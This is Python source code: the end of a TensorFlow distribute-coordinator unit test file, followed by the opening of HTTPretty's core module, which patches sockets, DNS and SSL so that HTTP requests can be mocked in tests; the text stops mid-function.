self.assertEqual(len(self._worker_context["None"]), 1)
self.assertEqual(len(self._worker_context[EVALUATOR]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(self._worker_context["None"][0], (_strip_protocol(
_bytes_to_str(self._workers[0].target)), 3, True, True))
self.assertEqual(self._worker_context[EVALUATOR][0],
("fake_evaluator", 3, True, False))
class DistributeCoordinatorTestInpendentWorkerMode(
DistributeCoordinatorTestBase):
def testInGraph(self):
cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
threads = self._run_multiple_coordinator_in_threads(
self._in_graph_worker_fn,
MockStrategy(between_graph=False),
cluster_spec,
mode=INDEPENDENT_WORKER)
threads[WORKER][0].join()
self.assertEqual(self._result_correct, 1)
def testBetweenGraph(self):
cluster_spec = self._create_cluster_spec(
num_workers=NUM_WORKERS, num_ps=NUM_PS)
threads = self._run_multiple_coordinator_in_threads(
self._between_graph_worker_fn,
MockStrategy(between_graph=True),
cluster_spec,
mode=INDEPENDENT_WORKER)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# Each finished worker will increment self._result_correct.
self.assertEqual(self._result_correct, NUM_WORKERS)
def testBetweenGraphWithMonitoredSession(self):
cluster_spec = self._create_cluster_spec(
num_workers=NUM_WORKERS, num_ps=NUM_PS)
threads = self._run_multiple_coordinator_in_threads(
self._between_graph_with_monitored_session,
MockStrategy(between_graph=True),
cluster_spec,
mode=INDEPENDENT_WORKER)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# Each finished worker will increment self._result_correct.
self.assertEqual(self._result_correct, NUM_WORKERS)
def testBetweenGraphContext(self):
cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
# Dumps the task contexts and std server arguments.
with test.mock.patch.object(distribute_coordinator, "_run_std_server",
self._run_mock_std_server):
threads = self._run_multiple_coordinator_in_threads(
self._dump_worker_context,
MockStrategy(between_graph=True),
cluster_spec,
mode=INDEPENDENT_WORKER,
rpc_layer=None)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# There is only one type of task and three such tasks.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue(WORKER in self._worker_context)
self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(
self._worker_context[WORKER][0],
(_bytes_to_str(cluster_spec[WORKER][0]), NUM_WORKERS, True, True))
self.assertEqual(
self._worker_context[WORKER][1],
(_bytes_to_str(cluster_spec[WORKER][1]), NUM_WORKERS, False, True))
self.assertEqual(
self._worker_context[WORKER][2],
(_bytes_to_str(cluster_spec[WORKER][2]), NUM_WORKERS, False, True))
# Make sure each worker runs a std server.
self.assertEqual(len(self._std_servers), 1)
self.assertTrue(WORKER in self._std_servers)
self.assertEqual(len(self._std_servers[WORKER]), 3)
self.assertFalse(self._std_servers[WORKER][0].joined)
self.assertFalse(self._std_servers[WORKER][1].joined)
self.assertFalse(self._std_servers[WORKER][2].joined)
def testBetweenGraphStrategyProperties(self):
cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
# Dumps properties of the strategy objects.
with test.mock.patch.object(distribute_coordinator, "_run_std_server",
self._run_mock_std_server):
threads = self._run_multiple_coordinator_in_threads(
self._dump_strategy_property,
MockStrategy(between_graph=True, should_init=True),
cluster_spec,
mode=INDEPENDENT_WORKER,
rpc_layer=None)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# There is only one type of task and there three such tasks.
self.assertEqual(len(self._strategy_property), 1)
self.assertTrue(WORKER in self._strategy_property)
self.assertEqual(len(self._strategy_property[WORKER]), NUM_WORKERS)
# Check whether each task has the right properties of should_init,
# should_checkpoint and should_save_summary.
self.assertEqual(self._strategy_property[WORKER][0], (True, True, True))
self.assertEqual(self._strategy_property[WORKER][1], (True, False, False))
self.assertEqual(self._strategy_property[WORKER][2], (True, False, False))
def testInGraphContext(self):
cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
# Dumps the task contexts and std server arguments.
with test.mock.patch.object(distribute_coordinator, "_run_std_server",
self._run_mock_std_server):
threads = self._run_multiple_coordinator_in_threads(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec,
mode=INDEPENDENT_WORKER,
rpc_layer=None)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# There is only a "None" task in the dumped task context.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue("None" in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(
self._worker_context["None"][0],
(_bytes_to_str(cluster_spec[WORKER][0]), NUM_WORKERS, True, True))
# Make sure each worker runs a std server.
self.assertEqual(len(self._std_servers), 1)
self.assertTrue(WORKER in self._std_servers)
self.assertEqual(len(self._std_servers[WORKER]), 3)
self.assertFalse(self._std_servers[WORKER][0].joined)
self.assertTrue(self._std_servers[WORKER][1].joined)
self.assertTrue(self._std_servers[WORKER][2].joined)
def testInGraphContextWithEval(self):
# Adds a EVALUATOR job.
cluster_spec = self._create_cluster_spec(
num_workers=NUM_WORKERS, has_eval=True)
# Dumps the task contexts and std server arguments.
with test.mock.patch.object(distribute_coordinator, "_run_std_server",
self._run_mock_std_server):
threads = self._run_multiple_coordinator_in_threads(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec,
mode=INDEPENDENT_WORKER,
rpc_layer=None)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
threads[EVALUATOR][0].join()
# There are one "None" task and one EVALUATOR task.
self.assertEqual(len(self._worker_context), 2)
self.assertTrue("None" in self._worker_context)
self.assertTrue(EVALUATOR in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
self.assertEqual(len(self._worker_context[EVALUATOR]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(self._worker_context["None"][0],
(_bytes_to_str(cluster_spec[WORKER][0]), 3, True, True))
self.assertEqual(self._worker_context[EVALUATOR][0],
(cluster_spec[EVALUATOR][0], 3, True, False))
# Make sure each worker runs a std server.
self.assertEqual(len(self._std_servers), 2)
self.assertTrue(WORKER in self._std_servers)
self.assertTrue(EVALUATOR in self._std_servers)
self.assertEqual(len(self._std_servers[WORKER]), 3)
self.assertEqual(len(self._std_servers[EVALUATOR]), 1)
self.assertFalse(self._std_servers[WORKER][0].joined)
self.assertTrue(self._std_servers[WORKER][1].joined)
self.assertTrue(self._std_servers[WORKER][2].joined)
self.assertFalse(self._std_servers[EVALUATOR][0].joined)
def testRunStdServerInGoogleEnvironment(self):
cluster_spec = {"worker": ["fake_worker"], "ps": ["localhost:0"]}
tf_config = {"cluster": cluster_spec, "environment": "google"}
joined = [False]
def _fake_sleep(_):
joined[0] = True
original_sys_exit(0)
def _thread_fn(cluster_spec):
distribute_coordinator.run_distribute_coordinator(
None,
None,
mode=INDEPENDENT_WORKER,
cluster_spec=cluster_spec,
task_type="ps",
task_id=0)
with test.mock.patch.dict(
"os.environ",
{"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
time, "sleep", _fake_sleep):
t = threading.Thread(target=_thread_fn, args=(cluster_spec,))
t.start()
t.join()
self.assertTrue(joined[0])
def testRpcLayerEnvironmentVariable(self):
cluster_spec = {"worker": ["fake_worker"], "ps": ["fake_ps"]}
tf_config = {"cluster": cluster_spec, "rpc_layer": "cake"}
rpc_layer_from_coordinator = [None]
def _run_mock_server(cluster_spec=None,
task_type=None,
task_id=None,
session_config=None,
rpc_layer=None,
environment=None):
del cluster_spec, task_type, task_id, session_config, environment
rpc_layer_from_coordinator[0] = rpc_layer
return MockServer()
with test.mock.patch.dict(
"os.environ",
{"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
distribute_coordinator, "_run_std_server", _run_mock_server):
distribute_coordinator.run_distribute_coordinator(
None,
None,
mode=INDEPENDENT_WORKER,
cluster_spec=cluster_spec,
task_type="ps",
task_id=0)
self.assertEqual(rpc_layer_from_coordinator[0], "cake")
if __name__ == "__main__":
# TODO(yuefengz): find a smart way to terminite std server threads.
with test.mock.patch.object(sys, "exit", os._exit):
test.main()
|
core.py | # #!/usr/bin/env python
# -*- coding: utf-8 -*-
# <HTTPretty - HTTP client mock for Python>
# Copyright (C) <2011-2018> Gabriel Falcao <gabriel@nacaolivre.org>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
from __future__ import unicode_literals
import codecs
import contextlib
import functools
import hashlib
import inspect
import itertools
import json
import re
import socket
import tempfile
import threading
import traceback
import warnings
from functools import partial
from .compat import (
PY3,
StringIO,
text_type,
binary_type,
BaseClass,
BaseHTTPRequestHandler,
quote,
quote_plus,
urlencode,
encode_obj,
urlunsplit,
urlsplit,
parse_qs,
unquote_utf8,
ClassTypes,
basestring
)
from .http import (
STATUSES,
HttpBaseClass,
parse_requestline,
last_requestline,
)
from .utils import (
utf8,
decode_utf8,
)
from .errors import HTTPrettyError, UnmockedError
from datetime import datetime
from datetime import timedelta
from errno import EAGAIN
old_socket = socket.socket
old_SocketType = socket.SocketType
old_create_connection = socket.create_connection
old_gethostbyname = socket.gethostbyname
old_gethostname = socket.gethostname
old_getaddrinfo = socket.getaddrinfo
old_socksocket = None
old_ssl_wrap_socket = None
old_sslwrap_simple = None
old_sslsocket = None
old_sslcontext_wrap_socket = None
MULTILINE_ANY_REGEX = re.compile(r'.*', re.M)
hostname_re = re.compile(r'\^?(?:https?://)?[^:/]*[:/]?')
try: # pragma: no cover
import socks
old_socksocket = socks.socksocket
except ImportError:
socks = None
try: # pragma: no cover
import ssl
old_ssl_wrap_socket = ssl.wrap_socket
try:
old_sslcontext_wrap_socket = ssl.SSLContext.wrap_socket
except AttributeError:
pass
if not PY3:
old_sslwrap_simple = ssl.sslwrap_simple
old_sslsocket = ssl.SSLSocket
except ImportError: # pragma: no cover
ssl = None
try:
import requests.packages.urllib3.connection as requests_urllib3_connection
old_requests_ssl_wrap_socket = requests_urllib3_connection.ssl_wrap_socket
except ImportError:
requests_urllib3_connection = None
DEFAULT_HTTP_PORTS = frozenset([80])
POTENTIAL_HTTP_PORTS = set(DEFAULT_HTTP_PORTS)
DEFAULT_HTTPS_PORTS = frozenset([443])
POTENTIAL_HTTPS_PORTS = set(DEFAULT_HTTPS_PORTS)
def FALLBACK_FUNCTION(x):
return x
class HTTPrettyRequest(BaseHTTPRequestHandler, BaseClass):
r"""
Represents a HTTP request. It takes a valid multi-line,
``\r\n`` separated string with HTTP headers and parse them out using
the internal `parse_request` method.
It also replaces the `rfile` and `wfile` attributes with StringIO
instances so that we guarantee that it won't make any I/O, neighter
for writing nor reading.
It has some convenience attributes:
``headers`` -> a mimetype object that can be cast into a dictionary,
contains all the request headers
``method`` -> the HTTP method used in this request
``querystring`` -> a dictionary containing lists with the
attributes. Please notice that if you need a single value from a
query string you will need to get it manually like:
``body`` -> the request body as a string
``parsed_body`` -> the request body parsed by ``parse_request_body``
.. testcode::
>>> request.querystring
{'name': ['Gabriel Falcao']}
>>> print request.querystring['name'][0]
"""
def __init__(self, headers, body=''):
# first of all, lets make sure that if headers or body are
# unicode strings, it must be converted into a utf-8 encoded
# byte string
self.raw_headers = utf8(headers.strip())
self._body = utf8(body)
# Now let's concatenate the headers with the body, and create
# `rfile` based on it
self.rfile = StringIO(b'\r\n\r\n'.join([self.raw_headers, self.body]))
# Creating `wfile` as an empty StringIO, just to avoid any
# real I/O calls
self.wfile = StringIO()
# parsing the request line preemptively
self.raw_requestline = self.rfile.readline()
# initiating the error attributes with None
self.error_code = None
self.error_message = None
# Parse the request based on the attributes above
if not self.parse_request():
return
# making the HTTP method string available as the command
self.method = self.command
# Now 2 convenient attributes for the HTTPretty API:
# `querystring` holds a dictionary with the parsed query string
try:
self.path = self.path.encode('iso-8859-1')
except UnicodeDecodeError:
pass
self.path = decode_utf8(self.path)
qstring = self.path.split("?", 1)[-1]
self.querystring = self.parse_querystring(qstring)
# And the body will be attempted to be parsed as
# `application/json` or `application/x-www-form-urlencoded`
"""a dictionary containing parsed request body or None if
HTTPrettyRequest doesn't know how to parse it. It currently
supports parsing body data that was sent under the
``content`-type` headers values: ``application/json`` or
``application/x-www-form-urlencoded``
"""
self.parsed_body = self.parse_request_body(self._body)
@property
def body(self):
return self._body
@body.setter
def body(self, value):
self._body = utf8(value)
# And the body will be attempted to be parsed as
# `application/json` or `application/x-www-form-urlencoded`
self.parsed_body = self.parse_request_body(self._body)
def __nonzero__(self):
return bool(self.body) or bool(self.raw_headers)
def __str__(self):
tmpl = '<HTTPrettyRequest("{}", total_headers={}, body_length={})>'
return tmpl.format(
self.headers.get('content-type', ''),
len(self.headers),
len(self.body),
)
def parse_querystring(self, qs):
"""parses an UTF-8 encoded query string into a dict of string lists
:param qs: a querystring
:returns: a dict of lists
"""
expanded = unquote_utf8(qs)
parsed = parse_qs(expanded)
result = {}
for k in parsed:
result[k] = list(map(decode_utf8, parsed[k]))
return result
def parse_request_body(self, body):
"""Attempt to parse the post based on the content-type passed.
Return the regular body if not
:param body: string
:returns: a python object such as dict or list in case the deserialization suceeded. Else returns the given param ``body``
"""
PARSING_FUNCTIONS = {
'application/json': json.loads,
'text/json': json.loads,
'application/x-www-form-urlencoded': self.parse_querystring,
}
content_type = self.headers.get('content-type', '')
do_parse = PARSING_FUNCTIONS.get(content_type, FALLBACK_FUNCTION)
try:
body = decode_utf8(body)
return do_parse(body)
except (Exception, BaseException):
return body
class EmptyRequestHeaders(dict):
"""A dict subclass used as internal representation of empty request
headers
"""
class HTTPrettyRequestEmpty(object):
"""Represents an empty :py:class:`~httpretty.core.HTTPrettyRequest`
where all its properties are somehow empty or ``None``
"""
method = None
url = None
body = ''
headers = EmptyRequestHeaders()
class FakeSockFile(object):
"""Fake socket file descriptor. Under the hood all data is written in
a temporary file, giving it a real file descriptor number.
"""
def __init__(self):
self.file = tempfile.TemporaryFile()
self._fileno = self.file.fileno()
def getvalue(self):
if hasattr(self.file, 'getvalue'):
return self.file.getvalue()
else:
return self.file.read()
def close(self):
self.socket.close()
self.file.close()
def fileno(self):
return self._fileno
def __getattr__(self, name):
return getattr(self.file, name)
class FakeSSLSocket(object):
"""Shorthand for :py:class:`~httpretty.core.fakesock`
"""
def __init__(self, sock, *args, **kw):
self._httpretty_sock = sock
def __getattr__(self, attr):
return getattr(self._httpretty_sock, attr)
class fakesock(object):
"""
fake :py:mod:`socket`
"""
class socket(object):
"""drop-in replacement for :py:class:`socket.socket`
"""
_entry = None
debuglevel = 0
_sent_data = []
def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM,
protocol=0, _sock=None):
self.truesock = (old_socket(family, type, protocol)
if httpretty.allow_net_connect
else None)
self._connected_truesock = False
self._closed = True
self.fd = FakeSockFile()
self.fd.socket = _sock or self
self.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
self._sock = _sock or self
self.is_http = False
self._bufsize = 1024
def getpeercert(self, *a, **kw):
now = datetime.now()
shift = now + timedelta(days=30 * 12)
return {
'notAfter': shift.strftime('%b %d %H:%M:%S GMT'),
'subjectAltName': (
('DNS', '*.%s' % self._host),
('DNS', self._host),
('DNS', '*'),
),
'subject': (
(
('organizationName', '*.%s' % self._host),
),
(
('organizationalUnitName',
'Domain Control Validated'),
),
(
('commonName', '*.%s' % self._host),
),
),
}
def ssl(self, sock, *args, **kw):
return sock
def setsockopt(self, level, optname, value):
if self.truesock:
self.truesock.setsockopt(level, optname, value)
def connect(self, address):
self._closed = False
try:
self._address = (self._host, self._port) = address
except ValueError:
# We get here when the address is just a string pointing to a
# unix socket path/file
#
# See issue #206
self.is_http = False
else:
ports_to_check = (
POTENTIAL_HTTP_PORTS.union(POTENTIAL_HTTPS_PORTS))
self.is_http = self._port in ports_to_check
if not self.is_http:
if self.truesock and not self._connected_truesock:
self.truesock.connect(self._address)
self._connected_truesock = True
else:
raise UnmockedError()
elif self.truesock and not self._connected_truesock:
matcher = httpretty.match_http_address(self._host, self._port)
if matcher is None:
self.truesock.connect(self._address)
self._connected_truesock = True
def fileno(self):
if self.truesock:
return self.truesock.fileno()
return self.fd.fileno()
def close(self):
if self._connected_truesock:
self.truesock.close()
self._connected_truesock = False
self._closed = True
def makefile(self, mode='r', bufsize=-1):
"""Returns this fake socket's own tempfile buffer.
If there is an entry associated with the socket, the file
descriptor gets filled in with the entry data before being
returned.
"""
self._mode = mode
self._bufsize = bufsize
if self._entry:
t = threading.Thread(
target=self._entry.fill_filekind, args=(self.fd,)
)
t.start()
if self.timeout == socket._GLOBAL_DEFAULT_TIMEOUT:
timeout = None
else:
timeout = self.timeout
t.join(timeout)
if t.is_alive():
raise socket.timeout
return self.fd
def real_sendall(self, data, *args, **kw):
"""Sends data to the remote server. This method is called
when HTTPretty identifies that someone is trying to send
non-http data.
The received bytes are written in this socket's tempfile
buffer so that HTTPretty can return it accordingly when
necessary.
"""
if not self.truesock:
raise UnmockedError()
if not self.is_http:
return self.truesock.sendall(data, *args, **kw)
if self._address[1] == 443 and old_sslsocket:
sock = old_sslsocket(self.truesock)
else:
sock = self.truesock
if not self._connected_truesock:
sock.connect(self._address)
sock.setblocking(1)
sock.sendall(data, *args, **kw)
should_continue = True
while should_continue:
try:
received = sock.recv(self._bufsize)
self.fd.write(received)
should_continue = bool(received.strip())
except socket.error as e:
if e.errno == EAGAIN:
continue
break
self.fd.seek(0)
def sendall(self, data, *args, **kw):
self._sent_data.append(data)
self.fd = FakeSockFile()
self.fd.socket = self
try:
requestline, _ = data.split(b'\r\n', 1)
method, path, version = parse_requestline(
decode_utf8(requestline))
is_parsing_headers = True
except ValueError:
path = ''
is_parsing_headers = False
if self._entry is None:
# If the previous request wasn't mocked, don't
# mock the subsequent sending of data
return self.real_sendall(data, *args, **kw)
else:
method = self._entry.method
path = self._entry.info.path
self.fd.seek(0)
if not is_parsing_headers:
if len(self._sent_data) > 1:
headers = utf8(last_requestline(self._sent_data))
meta = self._entry.request.headers
body = utf8(self._sent_data[-1])
if meta.get('transfer-encoding', '') == 'chunked':
if not body.isdigit() and (body != b'\r\n') and (body != b'0\r\n\r\n'):
self._entry.request.body += body
else:
self._entry.request.body += body
httpretty.historify_request(headers, body, False)
return
# path might come with
s = urlsplit(path)
POTENTIAL_HTTP_PORTS.add(int(s.port or 80))
parts = list(map(utf8, data.split(b'\r\n\r\n', 1)))
if len(parts) == 2:
headers, body = parts
else:
headers = ''
body = data
request = httpretty.historify_request(headers, body)
info = URIInfo(
hostname=self._host,
port=self._port,
path=s.path,
query=s.query,
last_request=request
)
matcher, entries = httpretty.match_uriinfo(info)
if not entries:
self._entry = None
self.real_sendall(data)
return
self._entry = matcher.get_next_entry(method, info, request)
def debug(self, truesock_func, *a, **kw):
if self.is_http:
frame = inspect.stack()[0][0]
lines = list(map(utf8, traceback.format_stack(frame)))
message = [
"HTTPretty intercepted and unexpected socket method call.",
("Please open an issue at "
"'https://github.com/gabrielfalcao/HTTPretty/issues'"),
"And paste the following traceback:\n",
"".join(decode_utf8(lines)),
]
raise RuntimeError("\n".join(message))
if not self.truesock:
raise UnmockedError()
return getattr(self.truesock, truesock_func)(*a, **kw)
def settimeout(self, new_timeout):
self.timeout = new_timeout
def send(self, *args, **kwargs):
return self.debug('send', *args, **kwargs)
def sendto(self, *args, **kwargs):
return self.debug('sendto', *args, **kwargs)
def recvfrom_into(self, *args, **kwargs):
return self.debug('recvfrom_into', *args, **kwargs)
def recv_into(self, *args, **kwargs):
return self.debug('recv_into', *args, **kwargs)
def recvfrom(self, *args, **kwargs):
return self.debug('recvfrom', *args, **kwargs)
def recv(self, *args, **kwargs):
return self.debug('recv', *args, **kwargs)
def __getattr__(self, name):
if not self.truesock:
raise UnmockedError()
return getattr(self.truesock, name)
def fake_wrap_socket(orig_wrap_socket_fn, *args, **kw):
"""drop-in replacement for py:func:`ssl.wrap_socket`
"""
server_hostname = kw.get('server_hostname')
if server_hostname is not None:
matcher = httpretty.match_https_hostname(server_hostname)
if matcher is None:
return orig_wrap_socket_fn(*args, **kw)
if 'sock' in kw:
return kw['sock']
else:
return args[0]
def create_fake_connection(
address,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
source_address=None):
"""drop-in replacement for :py:func:`socket.create_connection`"""
s = fakesock.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT:
s.settimeout(timeout)
if source_address:
s.bind(source_address)
s.connect(address)
return s
def fake_gethostbyname(host):
"""drop-in replacement for :py:func:`socket.gethostbyname`"""
return '127.0.0.1'
def fake_gethostname():
"""drop-in replacement for :py:func:`socket.gethostname`"""
return 'localhost'
def fake_getaddrinfo(
host, port, family=None, socktype=None, proto=None, flags=None):
"""drop-in replacement for :py:func:`socket.getaddrinfo`"""
return [(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
'', (host, port))]
class Entry(BaseClass):
"""Created by :py:meth:`~httpretty.core.httpretty.register_uri` and
stored in memory as internal representation of a HTTP
request/response definition.
:param method: string
:param uri: string
:param body: string
:param adding_headers: dict - headers to be added to the response
:param forcing_headers: dict - headers to be forcefully set in the response
:param status: an integer (e.g.: ``status=200``)
:param streaming: bool - whether to stream the response
:param headers: keyword-args with headers to be added to the response
.. warning:: When using the ``forcing_headers`` option make sure to add the header ``Content-Length`` otherwise calls using :py:mod:`requests` will try to load the response endlessly.
"""
def __init__(self, method, uri, body,
adding_headers=None,
forcing_headers=None,
status=200,
streaming=False,
**headers):
self.method = method
self.uri = uri
self.info = None
self.request = None
self.body_is_callable = False
if hasattr(body, "__call__"):
self.callable_body = body
self.body = None
self.body_is_callable = True
elif isinstance(body, text_type):
self.body = utf8(body)
else:
self.body = body
self.streaming = streaming
if not streaming and not self.body_is_callable:
self.body_length = len(self.body or '')
else:
self.body_length = 0
self.adding_headers = adding_headers or {}
self.forcing_headers = forcing_headers or {}
self.status = int(status)
for k, v in headers.items():
name = "-".join(k.split("_")).title()
self.adding_headers[name] = v
self.validate()
def validate(self):
"""validates the body size with the value of the ``Content-Length``
header
"""
content_length_keys = 'Content-Length', 'content-length'
for key in content_length_keys:
got = self.adding_headers.get(
key, self.forcing_headers.get(key, None))
if got is None:
continue
igot = None
try:
igot = int(got)
except (ValueError, TypeError):
warnings.warn(
'HTTPretty got to register the Content-Length header '
'with "%r" which is not a number' % got)
return
if igot and igot > self.body_length:
raise HTTPrettyError(
'HTTPretty got inconsistent parameters. The header '
'Content-Length you registered expects size "%d" but '
'the body you registered for that has actually length '
'"%d".' % (
igot, self.body_length,
)
)
def __str__(self):
return r'<Entry {} {} getting {}>'.format(
self.method,
self.uri,
self.status
)
def normalize_headers(self, headers):
"""Normalize keys in header names so that ``COntent-tyPe`` becomes ``content-type``
:param headers: dict
:returns: dict
"""
new = {}
for k in headers:
new_k = '-'.join([s.lower() for s in k.split('-')])
new[new_k] = headers[k]
return new
def fill_filekind(self, fk):
"""writes HTTP Response data to a file descriptor
:parm fk: a file-like object
.. warning:: **side-effect:** this method moves the cursor of the given file object to zero
"""
now = datetime.utcnow()
headers = {
'status': self.status,
'date': now.strftime('%a, %d %b %Y %H:%M:%S GMT'),
'server': 'Python/HTTPretty',
'connection': 'close',
}
if self.forcing_headers:
headers = self.forcing_headers
if self.adding_headers:
headers.update(
self.normalize_headers(
self.adding_headers))
headers = self.normalize_headers(headers)
status = headers.get('status', self.status)
if self.body_is_callable:
status, headers, self.body = self.callable_body(self.request, self.info.full_url(), headers)
headers = self.normalize_headers(headers)
# TODO: document this behavior:
if 'content-length' not in headers:
headers.update({
'content-length': len(self.body)
})
string_list = [
'HTTP/1.1 %d %s' % (status, STATUSES[status]),
]
if 'date' in headers:
string_list.append('date: %s' % headers.pop('date'))
if not self.forcing_headers:
content_type = headers.pop('content-type',
'text/plain; charset=utf-8')
content_length = headers.pop('content-length',
self.body_length)
string_list.append('content-type: %s' % content_type)
if not self.streaming:
string_list.append('content-length: %s' % content_length)
server = headers.pop('server', None)
if server:
string_list.append('server: %s' % server)
for k, v in headers.items():
string_list.append(
'{}: {}'.format(k, v),
)
for item in string_list:
fk.write(utf8(item) + b'\n')
fk.write(b'\r\n')
if self.streaming:
self.body, body = itertools.tee(self.body)
for chunk in body:
fk.write(utf8(chunk))
else:
fk.write(utf8(self.body))
fk.seek(0)
def url_fix(s, charset=None):
"""escapes special characters
"""
if charset:
warnings.warn("{}.url_fix() charset argument is deprecated".format(__name__), DeprecationWarning)
scheme, netloc, path, querystring, fragment = urlsplit(s)
path = quote(path, b'/%')
querystring = quote_plus(querystring, b':&=')
return urlunsplit((scheme, netloc, path, querystring, fragment))
class URIInfo(BaseClass):
"""Internal representation of `URIs <https://en.wikipedia.org/wiki/Uniform_Resource_Identifier>`_
.. tip:: all arguments are optional
:param username:
:param password:
:param hostname:
:param port:
:param path:
:param query:
:param fragment:
:param scheme:
:param last_request:
"""
default_str_attrs = (
'username',
'password',
'hostname',
'port',
'path',
)
def __init__(self,
username='',
password='',
hostname='',
port=80,
path='/',
query='',
fragment='',
scheme='',
last_request=None):
self.username = username or ''
self.password = password or ''
self.hostname = hostname or ''
if port:
port = int(port)
elif scheme == 'https':
port = 443
self.port = port or 80
self.path = path or ''
if query:
query_items = sorted(parse_qs(query).items())
self.query = urlencode(
encode_obj(query_items),
doseq=True,
)
else:
self.query = ''
if scheme:
self.scheme = scheme
elif self.port in POTENTIAL_HTTPS_PORTS:
self.scheme = 'https'
else:
self.scheme = 'http'
self.fragment = fragment or ''
self.last_request = last_request
def to_str(self, attrs):
fmt = ", ".join(['%s="%s"' % (k, getattr(self, k, '')) for k in attrs])
return r'<httpretty.URIInfo(%s)>' % fmt
def __str__(self):
return self.to_str(self.default_str_attrs)
def str_with_query(self):
attrs = self.default_str_attrs + ('query',)
return self.to_str(attrs)
def __hash__(self):
return int(hashlib.sha1(binary_type(self, 'ascii')).hexdigest(), 16)
def __eq__(self, other):
self_tuple = (
self.port,
decode_utf8(self.hostname.lower()),
url_fix(decode_utf8(self.path)),
)
other_tuple = (
other.port,
decode_utf8(other.hostname.lower()),
url_fix(decode_utf8(other.path)),
)
return self_tuple == other_tuple
def full_url(self, use_querystring=True):
"""
:param use_querystring: bool
:returns: a string with the full url with the format ``{scheme}://{credentials}{domain}{path}{query}``
"""
credentials = ""
if self.password:
credentials = "{}:{}@".format(
self.username, self.password)
query = ""
if use_querystring and self.query:
query = "?{}".format(decode_utf8(self.query))
result = "{scheme}://{credentials}{domain}{path}{query}".format(
scheme=self.scheme,
credentials=credentials,
domain=self.get_full_domain(),
path=decode_utf8(self.path),
query=query
)
return result
def get_full_domain(self):
"""
:returns: a string in the form ``{domain}:{port}`` or just the domain if the port is 80 or 443
"""
hostname = decode_utf8(self.hostname)
# Port 80/443 should not be appended to the url
if self.port not in DEFAULT_HTTP_PORTS | DEFAULT_HTTPS_PORTS:
return ":".join([hostname, str(self.port)])
return hostname
@classmethod
def from_uri(cls, uri, entry):
"""
:param uri: string
:param entry: an instance of :py:class:`~httpretty.core.Entry`
"""
result = urlsplit(uri)
if result.scheme == 'https':
POTENTIAL_HTTPS_PORTS.add(int(result.port or 443))
else:
POTENTIAL_HTTP_PORTS.add(int(result.port or 80))
return cls(result.username,
result.password,
result.hostname,
result.port,
result.path,
result.query,
result.fragment,
result.scheme,
entry)
class URIMatcher(object):
regex = None
info = None
def __init__(self, uri, entries, match_querystring=False, priority=0):
self._match_querystring = match_querystring
# CPython, Jython
regex_types = ('SRE_Pattern', 'org.python.modules.sre.PatternObject',
'Pattern')
is_regex = type(uri).__name__ in regex_types
if is_regex:
self.regex = uri
result = urlsplit(uri.pattern)
if result.scheme == 'https':
POTENTIAL_HTTPS_PORTS.add(int(result.port or 443))
else:
POTENTIAL_HTTP_PORTS.add(int(result.port or 80))
else:
self.info = URIInfo.from_uri(uri, entries)
self.entries = entries
self.priority = priority
# hash of current_entry pointers, per method.
self.current_entries = {}
def matches(self, info):
if self.info:
# Query string is not considered when comparing info objects, compare separately
return self.info == info and (not self._match_querystring or self.info.query == info.query)
else:
return self.regex.search(info.full_url(
use_querystring=self._match_querystring))
def __str__(self):
wrap = 'URLMatcher({})'
if self.info:
if self._match_querystring:
return wrap.format(text_type(self.info.str_with_query()))
else:
return wrap.format(text_type(self.info))
else:
return wrap.format(self.regex.pattern)
def get_next_entry(self, method, info, request):
"""Cycle through available responses, but only once.
Any subsequent requests will receive the last response"""
if method not in self.current_entries:
self.current_entries[method] = 0
# restrict selection to entries that match the requested
# method
entries_for_method = [e for e in self.entries if e.method == method]
if self.current_entries[method] >= len(entries_for_method):
self.current_entries[method] = -1
if not self.entries or not entries_for_method:
raise ValueError('I have no entries for method %s: %s'
